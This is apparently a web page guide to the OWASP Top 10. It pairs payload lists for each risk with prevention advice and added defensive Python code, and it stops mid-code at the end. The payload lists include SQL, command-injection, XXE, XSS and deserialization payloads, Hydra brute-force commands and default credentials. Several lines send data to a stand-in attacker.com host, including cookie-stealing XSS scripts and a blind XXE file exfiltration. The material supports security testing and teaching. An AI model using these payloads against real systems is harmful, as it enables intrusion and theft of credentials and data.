OWASP Top 10 Master Toolkit

Complete Web Application Security Guide – 2025 & Latest Updates

🚀 Complete OWASP Top 10 Coverage – All vulnerabilities with detection, exploitation, and prevention

📚 Beginner to Expert – From basic understanding to advanced attack techniques

🛡️ Ethical Use Only – For authorized testing, security research, and bug bounty hunting

Ready-to-Use Payloads – Copy-paste tested payloads for all OWASP Top 10 vulnerabilities


🛡️ OWASP Top 10 Overview

🎯 OWASP Top 10 2025: The most critical web application security risks that every developer and security professional should know.

Complete Risk Matrix

A01: Injection

Risk: HIGH
SQL, NoSQL, OS, LDAP injection flaws occur when untrusted data is sent as part of a command or query.

A02: Broken Authentication

Risk: HIGH
Application functions related to authentication and session management are often implemented incorrectly.

A03: Sensitive Data Exposure

Risk: MEDIUM
APIs do not adequately protect sensitive data such as financial, healthcare, and PII.

A04: XML External Entities (XXE)

Risk: MEDIUM
Poorly configured XML processors evaluate external entity references within XML documents.

A05: Broken Access Control

Risk: HIGH
Restrictions on what authenticated users are allowed to do are often not properly enforced.

A06: Security Misconfiguration

Risk: MEDIUM
Security misconfiguration is the most commonly seen issue in web applications.

A07: Cross-Site Scripting (XSS)

Risk: HIGH
XSS flaws occur when an application includes untrusted data in a web page without proper validation.

A08: Insecure Deserialization

Risk: MEDIUM
Insecure deserialization often leads to remote code execution.

A09: Known Vulnerable Components

Risk: LOW-MEDIUM
Components run with the same privileges as the application itself.

A10: Insufficient Logging & Monitoring

Risk: LOW
Insufficient logging and monitoring, coupled with missing incident response, lets attacks continue undetected.

Testing Methodology

OWASP Top 10 Testing Checklist:

1. Information Gathering
   - Reconnaissance
   - Technology stack identification
   - Entry point mapping

2. Authentication Testing
   - Weak password policies
   - Session management flaws
   - Multi-factor authentication bypass

3. Authorization Testing
   - Privilege escalation
   - Direct object references
   - Path traversal

4. Input Validation Testing
   - SQL injection
   - XSS vulnerabilities
   - Command injection
   - XXE attacks

5. Error Handling
   - Information disclosure
   - Stack traces
   - Error messages

6. Cryptography
   - Weak encryption
   - Insecure random numbers
   - Certificate validation

7. Business Logic Testing
   - Business rule bypass
   - Process flow manipulation
   - Data validation

8. Client-Side Testing
   - DOM-based XSS
   - JavaScript execution
   - HTML5 security

💉 A01: Injection Flaws

⚠️ High Risk: Injection flaws allow attackers to send hostile data to an interpreter as part of a command or query.

SQL Injection Detection

-- Basic SQL Injection Tests
'
"
`
')
")
`)
1'
1"
1`
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#
' UNION SELECT NULL--
' UNION SELECT 1,2,3--
'; DROP TABLE users--
' AND SLEEP(5)--
' AND WAITFOR DELAY '0:0:5'--

NoSQL Injection

// MongoDB Injection Payloads
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"$or": [{"username": "admin"}, {"username": "administrator"}]}
{"username": {"$in": ["admin", "administrator", "root"]}}

// CouchDB Injection
{"selector": {"username": {"$gt": null}}}
{"selector": {"$and": [{"username": {"$gte": ""}}, {"password": {"$gte": ""}}]}}

// JavaScript Injection in NoSQL
'; return true; var dummy='
'; return this.username == 'admin'; var dummy='

OS Command Injection

# Command Injection Payloads
; ls
& dir
| whoami
`id`
$(whoami)
; cat /etc/passwd
& type C:\Windows\System32\drivers\etc\hosts
| net user
; ps aux
& tasklist
|| id
; uname -a
& systeminfo
| cat /proc/version

# Time-based Detection
; sleep 10
& timeout 10
| ping -c 10 127.0.0.1
; ping -c 10 localhost

# Blind Command Injection
; nslookup burpcollaborator.net
& nslookup burpcollaborator.net
| curl http://attacker.com/$(whoami)

Prevention Methods

🛡️ Injection Prevention

  • Use Parameterized Queries: Always use prepared statements and parameterized queries
  • Input Validation: Validate all input using positive validation (whitelist)
  • Escape Special Characters: Properly escape all user-supplied data
  • Least Privilege: Use minimal database privileges for application accounts
  • Stored Procedures: Use stored procedures when possible
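Added example (not from the original toolkit) of the first two prevention items in practice, in Python against the built-in sqlite3 driver with a constructed two-row users table: the same `' OR '1'='1` payload listed above returns every row when concatenated and nothing when bound. The `nosql_login_filter` and `build_lookup_argv` helpers are assumed application code, not a library API, and apply the same idea to the `$ne`/`$gt` operator payloads and the `;`/`|`/`$()` command payloads.

```python
import re
import sqlite3

# Constructed sample table: two accounts; a login lookup should match at most one of them.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "<hash-a>"), ("bob", "<hash-b>")],
    )
    return conn

def lookup_user_concat(conn, username):
    # VULNERABLE: the value is spliced into the statement text, so a quote plus OR rewrites the WHERE clause.
    sql = "SELECT username FROM users WHERE username = '" + username + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]

def lookup_user_param(conn, username):
    # SAFE: the driver binds the value separately from the statement; the payload is just a string literal.
    sql = "SELECT username FROM users WHERE username = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username,))]

def nosql_login_filter(username, password):
    # Operator injection ({"$ne": null}, {"$gt": ""}) only works when the client accepts non-string
    # JSON values. Refusing them turns the filter into a literal equality match. The password is
    # verified against its stored hash afterwards and is never placed in the query itself.
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return {"username": username}

# Positive (allow-list) validation for a hostname argument: letters, digits, dots and hyphens only.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")

def build_lookup_argv(host):
    # Validate first, then build an argv list that is executed without a shell (subprocess.run(argv)).
    # Even if validation were bypassed, ';', '|', backticks and $(...) would reach nslookup as one
    # literal argument instead of being interpreted by a shell.
    if not HOSTNAME_RE.match(host):
        return None
    return ["nslookup", host]
```

Run `lookup_user_concat(conn, "' OR '1'='1")` and `lookup_user_param(conn, "' OR '1'='1")` side by side to see the difference; the parameterized form is the only one that needs no escaping logic at all.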

🔐 A02: Broken Authentication

⚠️ High Risk: Authentication and session management functions are often implemented incorrectly.

Weak Password Testing

# Common Default Passwords
admin:admin
admin:password
admin:123456
root:root
root:toor
administrator:password
user:user
guest:guest
demo:demo
test:test
admin:
:admin
admin:admin123
root:password
administrator:admin
sa:
oracle:oracle
mysql:mysql
postgres:postgres

Brute Force Payloads

# Hydra Commands
hydra -l admin -P passwords.txt http-post-form "/login:username=^USER^&password=^PASS^:Invalid"
hydra -L users.txt -P passwords.txt ssh://target.com
hydra -l admin -P passwords.txt ftp://target.com
hydra -L users.txt -P passwords.txt rdp://target.com

# Common Username Lists
admin
administrator
root
user
guest
demo
test
sa
oracle
mysql
postgres

Prevention Methods

🛡️ Authentication Security

  • Strong Password Policy: Enforce complex passwords and regular changes
  • Multi-Factor Authentication: Implement proper MFA for all accounts
  • Session Security: Use secure session management practices
  • Account Lockout: Implement account lockout after failed attempts
  • Secure Recovery: Implement secure password recovery mechanisms
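Added example, not part of the original page: an authenticator that applies the lockout, strong-hashing and timing-equalisation points above. The policy constants, the `Authenticator` class and the injectable clock are assumptions for the demo; the only real APIs used are the standard library's PBKDF2 and constant-time compare.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

# Assumed policy values for this example; tune per application risk profile.
MAX_FAILURES = 5
LOCKOUT_SECONDS = 900
# Kept low so the demo runs quickly; OWASP's current guidance for PBKDF2-HMAC-SHA256 is 600,000.
PBKDF2_ITERATIONS = 100_000

def hash_password(password, salt=None):
    """Salted PBKDF2; returns (salt, digest) so both are stored per user."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return salt, digest

class Authenticator:
    def __init__(self, clock=time.time):
        self.clock = clock                    # injectable so tests can move time forward
        self.users = {}                       # username -> (salt, digest)
        self.failures = defaultdict(list)     # username -> timestamps of recent failures

    def register(self, username, password):
        self.users[username] = hash_password(password)

    def is_locked(self, username):
        now = self.clock()
        recent = [t for t in self.failures[username] if now - t < LOCKOUT_SECONDS]
        self.failures[username] = recent
        return len(recent) >= MAX_FAILURES

    def login(self, username, password):
        """Returns 'ok', 'denied' or 'locked'. The lock is checked before any hashing work."""
        if self.is_locked(username):
            return "locked"
        record = self.users.get(username)
        if record is None:
            # Unknown account: still run the hash so response time does not reveal valid usernames.
            hash_password(password, b"\x00" * 16)
            ok = False
        else:
            salt, stored = record
            ok = hmac.compare_digest(hash_password(password, salt)[1], stored)
        if not ok:
            self.failures[username].append(self.clock())
            return "denied"
        self.failures[username].clear()
        return "ok"
```

A per-account lockout on its own gives the owner of a password list like the one above a cheap way to lock legitimate users out, so pair it with per-source throttling or progressive delays and with MFA rather than relying on it alone.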

📊 A03: Sensitive Data Exposure

⚠️ Medium Risk: Many web applications do not properly protect sensitive data such as financial and healthcare information.

Data Discovery Techniques

# Common Sensitive Files
/.env
/config.php
/wp-config.php
/database.yml
/settings.py
/.git/config
/.svn/entries
/backup.sql
/dump.sql
/phpinfo.php
/admin/config.php
/includes/config.inc.php
/application.properties
/web.config
/app.config
/.htaccess
/.htpasswd
/robots.txt
/sitemap.xml

Directory Traversal

# Path Traversal Payloads
../../../etc/passwd
..\..\..\..\windows\system32\drivers\etc\hosts
....//....//....//....//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
..////..////..////..////etc//passwd
..\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\drivers\\\\etc\\\\hosts

Prevention Methods

🛡️ Data Protection

  • Encrypt Sensitive Data: Use strong encryption at rest and in transit
  • Minimize Data Storage: Don’t store sensitive data unnecessarily
  • Secure Transmission: Use HTTPS for all communications
  • Access Controls: Implement proper authorization for sensitive data
  • Data Classification: Classify and handle data according to sensitivity

📄 A04: XML External Entities (XXE)

⚠️ Medium Risk: Many older or poorly configured XML processors evaluate external entity references within XML documents.

Basic XXE Payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

Blind XXE Payloads

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe; ]>
<stockCheck><productId>1</productId></stockCheck>

<!-- External DTD file (malicious.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

Prevention Methods

🛡️ XXE Prevention

  • Disable External Entities: Configure XML parsers to disable external entity processing
  • Input Validation: Validate and sanitize all XML input
  • Use Whitelists: Use whitelisting for XML schema validation
  • Update Libraries: Keep XML processing libraries up to date
  • Network Segmentation: Isolate XML processing from sensitive systems
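Added example, not from the original page: the first prevention item (disable external entities) implemented as a DTD refusal in front of Python's standard ElementTree parser. The `stockCheck` document shape and the function names are assumptions taken from the payloads above; the sample documents are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Refuse any DTD up front. No stockCheck message legitimately carries one, and without a DOCTYPE
# there is nowhere to declare an external or parameter entity, so the parser never resolves one.
# (The equivalent parser switch in Java JAXP is the feature
#  http://apache.org/xml/features/disallow-doctype-decl.)
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

def is_dtd_free(raw):
    # Apply this to the exact bytes the parser will receive; a re-encoding step in between would
    # let the check and the parser see different documents.
    return DTD_MARKER.search(raw) is None

def parse_stock_check(raw):
    """Return the productId text for a well-formed, DTD-free stockCheck document, else None."""
    if not is_dtd_free(raw):
        return None
    try:
        root = ET.fromstring(raw)
    except ET.ParseError:
        return None
    if root.tag != "stockCheck":
        return None
    node = root.find("productId")
    return None if node is None else (node.text or "")

# Constructed sample documents following the shapes shown above.
BENIGN_DOC = b'<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId></stockCheck>'
XXE_DOC = (b'<?xml version="1.0" encoding="UTF-8"?>'
           b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
           b'<stockCheck><productId>&xxe;</productId></stockCheck>')
BLIND_XXE_DOC = (b'<?xml version="1.0" encoding="UTF-8"?>'
                 b'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/malicious.dtd"> %xxe; ]>'
                 b'<stockCheck><productId>1</productId></stockCheck>')
```

Rejecting the DOCTYPE outright is simpler and easier to audit than configuring each resolver feature individually, and it covers the blind variant too, because the parameter entity that fetches `malicious.dtd` can only be declared inside a DTD.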

🔓 A05: Broken Access Control

⚠️ High Risk: Restrictions on what authenticated users are allowed to do are often not properly enforced.

Insecure Direct Object References (IDOR)

# IDOR Testing
# Change IDs in URLs
/user/profile?id=1
/user/profile?id=2
/user/profile?id=3

# Change IDs in requests
POST /api/users/1 HTTP/1.1
POST /api/users/2 HTTP/1.1
POST /api/users/3 HTTP/1.1

# Test different ID formats
/user/123
/user/admin
/user/0001
/user/%2e%2e%2fadmin
/user/../admin

# UUID manipulation
/user/550e8400-e29b-41d4-a716-446655440000
/user/550e8400-e29b-41d4-a716-446655440001

# Base64 encoded IDs
/user/MTIz (123 in base64)
/user/YWRtaW4= (admin in base64)

Privilege Escalation

# Horizontal Privilege Escalation
# Access other users' data
GET /api/users/123/orders HTTP/1.1
GET /api/users/456/orders HTTP/1.1

# Vertical Privilege Escalation
# Try admin functions as regular user
GET /admin/users HTTP/1.1
POST /admin/delete-user HTTP/1.1
PUT /admin/change-role HTTP/1.1

# Parameter manipulation
POST /api/users HTTP/1.1
Content-Type: application/json

{
  "username": "newuser",
  "role": "admin",
  "isAdmin": true,
  "permissions": ["all"]
}

Prevention Methods

🛡️ Access Control Security

  • Implement Proper Authorization: Check permissions on every request
  • Use Indirect Object References: Use random IDs or hashes instead of predictable IDs
  • Principle of Least Privilege: Grant minimum necessary permissions
  • Rate Limiting: Implement rate limiting for sensitive operations
  • Logging and Monitoring: Log all access control failures
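Added example (not the page's code) of the first three items above: an object-level owner check on every request, and an allow-list that drops the `role`/`isAdmin`/`permissions` fields from the parameter-manipulation request shown earlier. User and order records, field names and function names are constructed for the demo.

```python
# Constructed sample data: two ordinary users, one admin, and one order per user.
USERS = {"u-123": {"role": "user"}, "u-456": {"role": "user"}, "u-999": {"role": "admin"}}
ORDERS = {"o-1": {"owner": "u-123", "total": 42.0}, "o-2": {"owner": "u-456", "total": 7.5}}

# The only fields a self-service client may set. role / isAdmin / permissions are never bound from input.
USER_WRITABLE_FIELDS = frozenset({"username", "display_name", "email"})

class Forbidden(Exception):
    pass

def get_order(actor_id, order_id):
    """Authorization is decided per object on every request: owner or admin, not merely 'logged in'."""
    actor = USERS.get(actor_id)
    order = ORDERS.get(order_id)
    if actor is None or order is None:
        # Same outcome for "does not exist" and "not yours" so the endpoint is not an existence oracle.
        raise Forbidden("not found")
    if order["owner"] != actor_id and actor["role"] != "admin":
        raise Forbidden("not found")
    return order

def can_access_order(actor_id, order_id):
    try:
        get_order(actor_id, order_id)
        return True
    except Forbidden:
        return False

def create_user_from_request(payload):
    """Mass-assignment defence: copy allow-listed keys only; report what was dropped so it can be logged."""
    dropped = sorted(set(payload) - USER_WRITABLE_FIELDS)
    user = {k: payload[k] for k in USER_WRITABLE_FIELDS if k in payload}
    user["role"] = "user"          # the server assigns privilege; the client never does
    return {"user": user, "dropped_fields": dropped}
```

Random or hashed identifiers (the "indirect object references" item) make IDs harder to guess, but they are a complement to the owner check above, not a substitute: a leaked UUID still opens the object unless `get_order` refuses it.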

⚙️ A06: Security Misconfiguration

⚠️ Medium Risk: Security misconfiguration is the most commonly seen issue across all industries.

Common Misconfigurations

# Default credentials
admin:admin
admin:password
root:root
admin:123456
sa:
oracle:oracle
mysql:mysql
postgres:postgres

# Debug mode enabled
?debug=true
?test=true
?dev=true
X-Debug: 1
X-Test-Mode: 1

# Exposed configuration files
/.env
/config.php
/wp-config.php
/database.yml
/settings.py
/.git/config
/web.config
/app.config
/.htaccess
/phpinfo.php

Prevention Methods

🛡️ Configuration Security

  • Security Hardening: Follow security hardening guides for all components
  • Remove Defaults: Remove or change all default accounts and configurations
  • Regular Updates: Keep all software components up to date
  • Security Headers: Implement all relevant security headers
  • Error Handling: Implement custom error pages that don’t reveal information

🌐 A07: Cross-Site Scripting (XSS)

⚠️ High Risk: XSS flaws occur when an application includes untrusted data in a web page without proper validation.

Reflected XSS Payloads

<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(window.origin)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>
<body onload=alert('XSS')>
<details open ontoggle=alert('XSS')>
<marquee onstart=alert('XSS')>
javascript:alert('XSS')
'><script>alert('XSS')</script>
"><script>alert('XSS')</script>

Stored XSS Payloads

<script>
var img = new Image();
img.src = 'http://attacker.com/steal?cookie=' + document.cookie;
</script>

<script>
fetch('http://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        cookie: document.cookie,
        localStorage: localStorage,
        sessionStorage: sessionStorage,
        url: window.location.href
    })
});
</script>

Filter Bypasses

# Case variation
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>

# Encoding bypasses
&lt;script&gt;alert('XSS')&lt;/script&gt;
%3Cscript%3Ealert('XSS')%3C/script%3E
\u003cscript\u003ealert('XSS')\u003c/script\u003e

# Comments bypass
<script>/**/alert('XSS')/**/</script>
<scr<!--ipt>alert('XSS')</scr-->ipt>

Prevention Methods

🛡️ XSS Prevention

  • Output Encoding: Encode all output based on context (HTML, JavaScript, CSS, URL)
  • Input Validation: Validate all input using whitelist approach
  • Content Security Policy: Implement strict CSP headers
  • HTTPOnly Cookies: Use HttpOnly flag for session cookies
  • DOM Security: Use safe DOM manipulation methods

📦 A08: Insecure Deserialization

⚠️ Medium Risk: Insecure deserialization often leads to remote code execution.

Java Deserialization

# Java serialized object detection
# Look for base64 encoded data starting with:
rO0AB  (Java serialization magic bytes)
aced00 (hex representation)

# Common vulnerable libraries:
- Apache Commons Collections
- Spring Framework
- Groovy
- Apache Commons BeanUtils

# Payload generation tools:
ysoserial-master.jar
java -jar ysoserial-master.jar CommonsCollections1 'calc.exe' | base64
java -jar ysoserial-master.jar CommonsCollections1 'ping attacker.com' | base64

PHP Deserialization

# PHP Object Injection
# Look for serialized PHP objects:
O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";}
a:2:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";}

# Magic methods exploitation:
__construct()
__destruct()
__toString()
__wakeup()
__call()
__get()
__set()

# POP chain payloads:
O:10:"FileReader":1:{s:8:"filename";s:11:"/etc/passwd";}
O:9:"LogWriter":1:{s:7:"logfile";s:23:"/var/www/html/shell.php";}

Prevention Methods

🛡️ Deserialization Security

  • Avoid Deserialization: Don’t deserialize untrusted data when possible
  • Input Validation: Implement strict type checking before deserialization
  • Signature Verification: Use digital signatures to verify serialized data
  • Sandboxing: Run deserialization in restricted environments
  • Monitoring: Monitor and log deserialization activities
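Added example, not from the original page, of the "signature verification" and "strict type checking" items: data is exchanged as JSON under an HMAC-SHA256 tag that is verified before anything is parsed, then checked against an allow-list of types and fields, so no language-native deserializer (Java `ObjectInputStream`, PHP `unserialize`) ever runs on untrusted bytes. The key, the `Session` schema and the function names are constructed assumptions.

```python
import base64
import binascii
import hashlib
import hmac
import json

# Assumed key for the demo; in production load it from a secret store and support rotation.
SECRET_KEY = b"constructed-demo-key-not-for-production"

# Allow-list of everything that may ever be deserialized, with the exact field set and type of each.
ALLOWED_TYPES = {
    "Session": {"user_id": str, "expires": int},
}

def _b64e(raw):
    return base64.urlsafe_b64encode(raw).decode("ascii")

def _body(type_name, data):
    # Canonical JSON so the producer and the verifier always MAC the same bytes.
    return json.dumps({"type": type_name, "data": data}, separators=(",", ":"), sort_keys=True).encode()

def serialize(type_name, data):
    """JSON body + HMAC-SHA256 tag. The consumer is the trust boundary, so checks live in deserialize()."""
    body = _body(type_name, data)
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return _b64e(body) + "." + _b64e(tag)

def deserialize(token):
    """Return (type_name, data) or None. Verify the MAC first, then the type allow-list, then the schema."""
    try:
        body_b64, tag_b64 = token.split(".", 1)
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):        # constant-time comparison
        return None
    obj = json.loads(body)
    if not isinstance(obj, dict):
        return None
    schema = ALLOWED_TYPES.get(obj.get("type"))
    data = obj.get("data")
    if schema is None or not isinstance(data, dict) or set(data) != set(schema):
        return None
    for field, expected_type in schema.items():
        value = data[field]
        # bool is a subclass of int in Python; reject it explicitly for int fields.
        if not isinstance(value, expected_type) or (expected_type is int and isinstance(value, bool)):
            return None
    return obj["type"], data

def swap_body_keep_tag(token, type_name, data):
    """What a party without the key can attempt: replace the body but reuse the existing tag."""
    _, tag_b64 = token.split(".", 1)
    return _b64e(_body(type_name, data)) + "." + tag_b64
```

Verifying the tag before parsing matters: parser bugs and resource-exhaustion payloads can only be reached by data that already carries a valid MAC, which an outsider cannot produce.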

🔧 A09: Using Components with Known Vulnerabilities

⚠️ Low-Medium Risk: Components such as libraries and frameworks run with the same privileges as the application.

Vulnerability Scanning

# Node.js dependency scanning
npm audit
npm audit fix
yarn audit

# Python dependency scanning
pip-audit
safety check
bandit -r .

# Ruby dependency scanning
bundle audit
brakeman

# Java dependency scanning
mvn dependency-check:check
gradle dependencyCheckAnalyze

# PHP dependency scanning
composer audit
psalm --security-analysis

Common Vulnerable Components

# JavaScript libraries
jQuery < 3.5.0 (XSS vulnerabilities)
Lodash < 4.17.19 (Prototype pollution)
Moment.js < 2.29.2 (ReDoS)
Bootstrap < 4.1.2 (XSS)

# Java libraries
Apache Struts 2 (RCE vulnerabilities)
Spring Framework < 5.3.21 (RCE)
Log4j < 2.17.0 (Log4Shell RCE)
Jackson < 2.12.6 (Deserialization)

# PHP libraries
PHPMailer < 6.5.0 (RCE)
Laravel < 8.83.8 (Various vulnerabilities)
Symfony < 5.4.11 (Security issues)

# WordPress plugins (commonly exploited)
Yoast SEO (Various versions)
Contact Form 7 (File upload issues)
WooCommerce (Various vulnerabilities)

Prevention Methods

🛡️ Component Security

  • Inventory Management: Maintain an inventory of all components and versions
  • Regular Updates: Keep all components updated to latest secure versions
  • Vulnerability Monitoring: Monitor security advisories for used components
  • Automated Scanning: Use automated tools to detect vulnerable components
  • Minimal Dependencies: Use only necessary components and remove unused ones

📝 A10: Insufficient Logging & Monitoring

⚠️ Low Risk: Insufficient logging and monitoring, coupled with missing or ineffective incident response, lets attacks continue undetected.

Log Injection Attacks

# CRLF injection in logs
username=admin%0d%0aINFO: User admin logged in successfully
username=test%0a%0d[CRITICAL] System compromised

# Log forging
username=admin%0d%0a[INFO] 127.0.0.1 - Admin logout successful%0d%0a[INFO] 127.0.0.1 - Admin login successful

# ANSI escape sequence injection
username=%1b[31mERROR: System hacked!%1b[0m
password=%1b[1;31mCRITICAL ALERT%1b[0m

Attack Patterns to Detect in Logs

# Multiple failed login attempts
username=admin&password=wrong1
username=admin&password=wrong2
username=admin&password=wrong3
(repeat 50+ times)

# SQL injection attempts
' OR 1=1--
'; DROP TABLE users--
' UNION SELECT * FROM information_schema.tables--

# Path traversal attempts
../../../etc/passwd
../../../../windows/system32/drivers/etc/hosts

# Command injection attempts
; whoami
& dir
| id

Prevention Methods

🛡️ Logging & Monitoring Best Practices

  • Comprehensive Logging: Log all security-relevant events with sufficient detail
  • Log Protection: Protect log files from unauthorized access and tampering
  • Real-time Monitoring: Implement real-time monitoring and alerting
  • Incident Response: Have a documented incident response plan
  • Log Analysis: Regularly analyze logs for security incidents
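Added example (not part of the original page) covering two of the items above: escaping control characters in user-controlled values before they are logged, which neutralises the CRLF and ANSI payloads listed earlier, and a sliding-window detector for the repeated-failed-login pattern run over a constructed log sample. The log line format and function names are assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

def sanitize_for_log(value):
    """Escape CR, LF, ESC and other control characters before a user-controlled value is logged.
    Escaping rather than deleting keeps the injection attempt itself visible in the record."""
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group()), str(value))

# Constructed log format for this example: "<ISO timestamp> auth <FAIL|OK> user=<name> ip=<addr>".
LOG_LINE = re.compile(r"^(?P<ts>\S+) auth (?P<result>FAIL|OK) user=(?P<user>\S+) ip=(?P<ip>\S+)$")

# Constructed sample: five failures for admin inside two minutes, two for bob, one for carol.
SAMPLE_LOG = """\
2025-01-10T12:00:01 auth FAIL user=admin ip=203.0.113.7
2025-01-10T12:00:02 auth FAIL user=admin ip=203.0.113.7
2025-01-10T12:00:02 auth OK user=alice ip=198.51.100.4
2025-01-10T12:00:03 auth FAIL user=bob ip=198.51.100.9
2025-01-10T12:00:04 auth FAIL user=admin ip=203.0.113.7
2025-01-10T12:00:05 auth FAIL user=admin ip=203.0.113.7
2025-01-10T12:00:09 auth FAIL user=bob ip=198.51.100.9
2025-01-10T12:00:11 auth FAIL user=admin ip=203.0.113.7
2025-01-10T12:30:00 auth FAIL user=carol ip=192.0.2.20
"""

def brute_force_candidates(log_text, threshold=5, window=timedelta(minutes=5)):
    """Usernames with at least `threshold` failed logins inside any sliding window of `window` length."""
    recent = defaultdict(list)
    flagged = set()
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m["result"] != "FAIL":
            continue          # lines that fail to parse deserve their own alert in production
        ts = datetime.fromisoformat(m["ts"])
        bucket = recent[m["user"]]
        bucket.append(ts)
        bucket[:] = [t for t in bucket if ts - t <= window]
        if len(bucket) >= threshold:
            flagged.add(m["user"])
    return sorted(flagged)
```

The same windowing logic keyed on the `ip` field instead of `user` catches password spraying (one source, many accounts), which a per-account threshold alone misses.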

🛡️ Prevention & Secure Development

Secure Coding Practices

// Input validation and sanitization
function validateInput(input) {
    // Whitelist validation
    const allowedChars = /^[a-zA-Z0-9_-]+$/;
    if (!allowedChars.test(input)) {
        throw new Error('Invalid input');
    }
    return input;
}

// Output encoding for HTML body and attribute context (JavaScript, CSS and URL
// contexts each need their own encoder, not this one)
function htmlEncode(str) {
    return String(str).replace(/[&<>"']/g, function(match) {
        return {
            '&': '&amp;',
            '<': '&lt;',
            '>': '&gt;',
            '"': '&quot;',
            "'": '&#x27;'
        }[match];
    });
}

Security Headers Implementation

# Essential Security Headers
Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
# Legacy header: current browsers ignore it, and CSP is the effective control
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=(), camera=()

# Apache .htaccess implementation (requires mod_headers)
Header always set Content-Security-Policy "default-src 'self'"
Header always set X-Frame-Options "DENY"
Header always set X-Content-Type-Options "nosniff"
Header always set X-XSS-Protection "1; mode=block"
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
Header always set Referrer-Policy "strict-origin-when-cross-origin"
Header always set Permissions-Policy "geolocation=(), microphone=(), camera=()"
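Added example, not from the original page: a check that compares a response's headers against the baseline listed above and reports what is missing or weak. The baseline values, finding strings and the constructed `GOOD_HEADERS`/`WEAK_HEADERS` samples are assumptions for the demo; X-XSS-Protection is intentionally not required because modern browsers ignore it.

```python
import re

# Expected baseline, names lower-cased for comparison. None means "must be present; value checked below".
BASELINE = {
    "content-security-policy": None,
    "x-frame-options": {"deny", "sameorigin"},
    "x-content-type-options": {"nosniff"},
    "strict-transport-security": None,
    "referrer-policy": {"no-referrer", "same-origin", "strict-origin", "strict-origin-when-cross-origin"},
}
ONE_YEAR = 31536000
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version")

def audit_headers(headers):
    """Return a list of finding strings for one response's headers; an empty list means the baseline is met."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    findings = []
    for name, allowed in BASELINE.items():
        if name not in h:
            findings.append("missing " + name)
        elif allowed is not None and h[name].lower() not in allowed:
            findings.append("weak %s: %s" % (name, h[name]))
    csp = h.get("content-security-policy", "")
    if "'unsafe-inline'" in csp or "'unsafe-eval'" in csp:
        findings.append("csp permits unsafe-inline/unsafe-eval")
    hsts = h.get("strict-transport-security", "")
    m = re.search(r"max-age=(\d+)", hsts)
    if hsts and (m is None or int(m.group(1)) < ONE_YEAR):
        findings.append("hsts max-age below one year: " + hsts)
    for name in DISCLOSING_HEADERS:
        if name in h:
            findings.append("version disclosure via " + name)
    return findings

# Constructed samples: the header set listed above, and a weak configuration for contrast.
GOOD_HEADERS = {
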